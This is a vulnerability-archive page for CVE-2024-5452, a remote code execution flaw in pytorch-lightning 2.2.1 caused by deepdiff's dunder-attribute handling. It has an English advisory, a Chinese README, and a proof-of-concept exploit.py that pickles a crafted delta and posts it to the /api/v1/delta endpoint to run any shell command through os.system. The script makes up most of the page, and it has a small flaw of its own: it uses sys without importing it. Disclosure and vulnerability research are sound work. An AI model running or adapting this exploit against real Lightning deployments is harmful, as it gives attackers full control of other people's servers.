Associated Vulnerability
Title:RCE via Property/Class Pollution in lightning-ai/pytorch-lightning (CVE-2024-5452)Description:A remote code execution (RCE) vulnerability exists in the lightning-ai/pytorch-lightning library version 2.2.1 due to improper handling of deserialized user input and mismanagement of dunder attributes by the `deepdiff` library. The library uses `deepdiff.Delta` objects to modify application state based on frontend actions. However, it is possible to bypass the intended restrictions on modifying dunder attributes, allowing an attacker to construct a serialized delta that passes the deserializer whitelist and contains dunder attributes. When processed, this can be exploited to access other modules, classes, and instances, leading to arbitrary attribute write and total RCE on any self-hosted pytorch-lightning application in its default configuration, as the delta endpoint is enabled by default.
Description
此漏洞的根本原因是**深度差异库(deepdiff)**在反序列化用户输入时,未正确处理双下划线(dunder)属性。 PyTorch Lightning 使用 deepdiff.Delta 对象根据前端操作修改应用状态,设计目标是仅允许特定状态变量的修改。
Readme
### 通过属性/类污染导致RCE:Lightning AI 的 PyTorch Lightning 状态修改端点漏洞
---
### 描述
此漏洞的根本原因是**深度差异库(deepdiff)**在反序列化用户输入时,未正确处理双下划线(dunder)属性。
PyTorch Lightning 使用 `deepdiff.Delta` 对象根据前端操作修改应用状态,设计目标是仅允许特定状态变量的修改。尽管 deepdiff 提供了沙盒化的 `pickle` 反序列化器,并限制了输入白名单以防止代码执行,但仍存在以下问题:
1. **dunder 属性绕过**:通过引号可以绕过 deepdiff 的对 dunder 属性的防护机制。
2. **序列化对象构造漏洞**:攻击者可以构造序列化的 delta 数据,该数据既通过了白名单检查,又包含了 dunder 属性。
因此,攻击者能够利用此漏洞通过属性污染访问其他模块、类和实例,最终完全控制应用状态(RCE)。
**默认配置的 PyTorch Lightning 应用均会受到此漏洞的影响**,因为 delta 接口默认启用。
---
### 漏洞复现(概念验证 - Proof of Concept)
#### 漏洞脚本(exploit.py)
以下脚本通过发送构造的 delta 数据,利用属性污染实现 RCE。
```python
import requests, time, pickle, pickletools
from collections import namedtuple
from ordered_set import OrderedSet
# 沙盒绕过和工具类定义
OrderedSet.__reduce__ = lambda self, *args: (OrderedSet, ())
class Root:
def __init__(self, path=None):
self.path = path or []
def __getitem__(self, item):
return self.__class__(self.path + [('GET', repr(item))])
def __getattr__(self, attr):
return self.__class__(self.path + [('GETATTR', repr(attr) if attr.startswith('__') else attr)])
def __reduce__(self, *args):
return str, (str(self),)
server_host = 'http://127.0.0.1:7501'
server_host = input(f'LightningApp 根URL [{server_host}]: ') or server_host
command = input('输入命令 [id]: ') or 'id'
def send_delta(d):
# 发送 delta 数据到远程主机
requests.post(server_host + '/api/v1/delta', headers={
'x-lightning-type': '1',
'x-lightning-session-uuid': '1',
'x-lightning-session-id': '1'
}, json={"delta": d})
# 构造要注入并执行的代码
injected_code = f"__import__('os').system({command!r})"
root = Root()
# 构造 delta 数据
delta = {
'attribute_added': {
root['function']: namedtuple,
sys.modules['lightning.app'].api.request_types._DeltaRequest.args: (injected_code,),
}
}
# 序列化并发送 payload
payload = pickletools.optimize(pickle.dumps(delta, 1)).decode() \
.replace('__builtin__', 'builtins') \
.replace('unicode', 'str')
send_delta(payload)
time.sleep(0.2)
send_delta({})
```
#### 演示应用代码(app.py)
```python
from lightning.app import LightningFlow, LightningApp
class SimpleFlow(LightningFlow):
def run(self):
pass
app = LightningApp(SimpleFlow())
```
---
### 核心漏洞点解析
1. **允许序列化数据传入 `/api/v1/delta`**:该接口缺乏对输入的严格检查。
2. **不正确的 dunder 属性处理**:攻击者通过 `repr()` 绕过 deepdiff 的限制,访问内部对象。
3. **属性污染链条**:最终修改应用内部结构,操控核心逻辑。
---
### 总结
此漏洞允许攻击者利用 delta 接口实现远程代码执行(RCE),影响所有默认配置的 PyTorch Lightning 应用。需及时修复以避免潜在风险。
File Snapshot
[4.0K] /data/pocs/3372c9d79f30cc51f8b697d5cbf7f747db65bde9
├── [ 11K] LICENSE
└── [3.4K] README.md
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →